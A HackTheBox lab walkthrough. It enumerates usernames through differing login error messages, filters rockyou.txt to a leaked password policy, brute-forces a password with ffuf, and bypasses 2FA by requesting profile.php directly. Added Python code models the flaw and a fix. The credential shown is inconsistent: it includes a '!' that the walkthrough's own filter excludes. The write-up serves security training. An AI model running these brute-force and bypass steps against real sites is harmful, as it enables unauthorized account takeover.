HackTheBox - Broken Authentication - Skills Assessment Walkthrough

Ido Abramov

Scenario

You are tasked to perform a security assessment of a client's web application. For the assessment, the client has not provided you with credentials. Apply what you have learned in this module to obtain the flag.

Walkthrough

Navigate to the target URL http://94.237.122.117:41239:

We can see a Login page - let's navigate to it:

Let's try the credentials test:test to examine the error message:

We don’t have any known usernames, but we need to find a way to distinguish between a registered username and a non-existent one.

Go to the Register page:

Register a new account with the credentials test:test.

Registration is rejected with an error message describing the password policy:

So, let's register an account that satisfies the policy, with the credentials test:Zz1234567890.

Go back to the login page and try to log in as the now-existing user with the wrong password, test:test:

The error message is different from the one we got for the non-existent user. The application reveals whether a username exists, so we can use that difference to enumerate valid usernames.

Let's use Burp to capture the request and save it to a file:

Then, enumerate the users using the request with ffuf:

ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt:FUZZ -request ./Desktop/login.txt -mr "credentials" --request-proto http

Found username:

gladys is a valid username, so now we can try brute-forcing its password via the login page.

Modify the login.txt request file to use the discovered username, and the value FUZZ in the password parameter:

Now we need to fuzz passwords. The registration error told us the policy, so we only keep entries of rockyou.txt that are exactly 12 characters long, contain at least one uppercase letter, one lowercase letter and one digit, and contain no special characters at all.

Use the following command to do this:

awk 'length($0)==12 && /^[a-zA-Z0-9]+$/ && /[A-Z]/ && /[a-z]/ && /[0-9]/' ./Desktop/rockyou.txt > ./Desktop/passwords.txt
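As an added example (not part of the original walkthrough), the same policy filter in Python, generalized so the length, the allowed character set and the required character classes can be changed when a registration form reveals a different policy. The wordlist below is constructed for the demo; filter_file streams a real rockyou.txt through the same function.

```python
"""Filter a wordlist down to candidates that satisfy a password policy.

Added example; generalizes the awk one-liner from the walkthrough to a
configurable policy. SAMPLE_WORDLIST is a constructed stand-in for rockyou.txt.
"""
import re
from typing import Iterable, List, Tuple

SAMPLE_WORDLIST = [
    "password",        # too short
    "Zz1234567890",    # 12 chars, upper, lower, digit -> kept
    "dwinaldasd13",    # no uppercase letter
    "DWINALDASD13",    # no lowercase letter
    "dWinaldasDaa",    # no digit
    "dWinaldasD1!",    # special character
    "dWinaldasD13",    # kept
    "Abcdefghij123",   # 13 chars
]


def policy_filter(words: Iterable[str], length: int = 12,
                  allowed: str = r"[A-Za-z0-9]",
                  required: Tuple[str, ...] = (r"[A-Z]", r"[a-z]", r"[0-9]")) -> List[str]:
    """Return the words matching the policy. With the defaults this is the same
    selection as awk 'length($0)==12 && /^[a-zA-Z0-9]+$/ && /[A-Z]/ && /[a-z]/ && /[0-9]/'."""
    whole = re.compile(rf"^{allowed}+$")           # no characters outside the allowed set
    classes = [re.compile(p) for p in required]    # every class must occur at least once
    keep = []
    for w in words:
        w = w.rstrip("\r\n")                        # lines read from a file carry newlines
        if len(w) != length or not whole.match(w):
            continue
        if all(c.search(w) for c in classes):
            keep.append(w)
    return keep


def filter_file(src: str, dst: str, **policy) -> int:
    """Stream a large wordlist through the filter; returns the number of lines kept.
    rockyou.txt contains non-UTF-8 bytes, so it is read as latin-1."""
    n = 0
    with open(src, encoding="latin-1") as fin, open(dst, "w", encoding="latin-1") as fout:
        for w in policy_filter(fin, **policy):
            fout.write(w + "\n")
            n += 1
    return n


if __name__ == "__main__":
    print(policy_filter(SAMPLE_WORDLIST))  # ['Zz1234567890', 'dWinaldasD13']
```

Reading the file lazily matters: rockyou.txt is about 14 million lines, and the filter only ever holds the survivors in memory.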

Then, use ffuf to find the password for the username:

ffuf -w ./Desktop/passwords.txt:FUZZ -request ./Desktop/login.txt --request-proto http

This will return a large number of results:

In Burp Repeater, a successful login with test:Zz1234567890 returns a 302 Found redirect, so let's restrict ffuf to matching that status code only:

ffuf -w ./Desktop/passwords.txt:FUZZ -request ./Desktop/login.txt --request-proto http -mc 302

Here is what we found:

We obtained valid credentials: gladys:dWinaldasD13!

When we login with those credentials, an OTP is required:

Let's try to brute-force it, assuming a four-digit code:

seq -w 0 9999 > ./Desktop/tokens.txt

Intercept the request and save it to a file:

Use the following command to brute-force the OTP:

ffuf -w ./Desktop/tokens.txt:FUZZ -request ./Desktop/2fa.txt --request-proto http

Every response is a 302 Found of the same size, so there is no visible oracle that separates the correct OTP from the wrong ones and we can't identify the valid token this way.

Back to our user test:Zz1234567890, we can see that the flow skips 2fa.php and goes directly to profile.php.

So, what if we request profile.php directly after logging in with gladys:dWinaldasD13, without ever submitting an OTP?

In Burp Repeater, send the login request and click Follow redirection:

We are redirected to /2fa.php:

Change the GET request from /2fa.php to /profile.php, keeping the same session cookie, then click 'Send':

The server returns the profile page with the flag: the 2FA step was bypassed. Evidently the application treats the session as authenticated as soon as the password is accepted and never checks that the second factor was completed before serving profile.php. 😁
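As an added illustration (not the target's source code, which we never see), here is a minimal Python model of the login, 2FA and profile steps that shows why the forced browse to profile.php works: the vulnerable profile handler checks only that a user logged in, while the fixed one also requires the OTP step to have completed. The user records, passwords, the OTP value and the lockout threshold are assumed values for the demo.

```python
"""Model of the login -> 2FA -> profile flow that explains the bypass.

Added illustration, not the target application's code. User records,
passwords, the OTP value and the lockout threshold are assumed demo values.
"""
import hmac
from dataclasses import dataclass
from typing import Callable, Optional, Tuple

# constructed demo users: gladys has 2FA enabled, test does not
USERS = {
    "gladys": {"password": "correct-horse-1", "otp_enabled": True, "otp": "0427"},
    "test": {"password": "Zz1234567890", "otp_enabled": False, "otp": None},
}
MAX_OTP_ATTEMPTS = 5  # assumed lockout threshold for the hardened flow

Response = Tuple[int, str]


@dataclass
class Session:
    user: Optional[str] = None     # set after the password step
    otp_verified: bool = False     # set only after a correct OTP
    otp_attempts: int = 0


def login(session: Session, username: str, password: str) -> str:
    """Password step; returns the path the server redirects to."""
    rec = USERS.get(username)
    if rec is None or not hmac.compare_digest(rec["password"], password):
        return "/login.php"
    session.user = username
    # a user without a second factor is fully authenticated here
    session.otp_verified = not rec["otp_enabled"]
    return "/2fa.php" if rec["otp_enabled"] else "/profile.php"


def verify_otp(session: Session, otp: str) -> bool:
    """OTP step with a lockout; without one a 4-digit code falls to seq -w 0 9999."""
    rec = USERS.get(session.user or "")
    if rec is None or not rec["otp_enabled"]:
        return False
    session.otp_attempts += 1
    if session.otp_attempts > MAX_OTP_ATTEMPTS:
        session.user = None  # invalidate the half-authenticated session
        return False
    if hmac.compare_digest(rec["otp"], otp):
        session.otp_verified = True
        return True
    return False


def profile_vulnerable(session: Session) -> Response:
    """The behaviour exploited in the walkthrough: only 'logged in' is checked."""
    if session.user is None:
        return 302, "/login.php"
    return 200, f"profile of {session.user}"


def profile_fixed(session: Session) -> Response:
    """Hardened gate: the second factor must be complete before any protected page."""
    if session.user is None:
        return 302, "/login.php"
    if not session.otp_verified:
        return 302, "/2fa.php"
    return 200, f"profile of {session.user}"


def forced_browse(handler: Callable[[Session], Response],
                  username: str, password: str) -> Response:
    """Replay the bypass: log in, ignore the redirect to /2fa.php, request /profile.php."""
    session = Session()
    login(session, username, password)
    return handler(session)


if __name__ == "__main__":
    print("vulnerable:", forced_browse(profile_vulnerable, "gladys", "correct-horse-1"))
    print("fixed:     ", forced_browse(profile_fixed, "gladys", "correct-horse-1"))
```

The fix is a per-request check on every protected page, not just on 2fa.php: the "authenticated" state only becomes true after the last factor, and the session state recorded between the two steps is explicitly partial.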
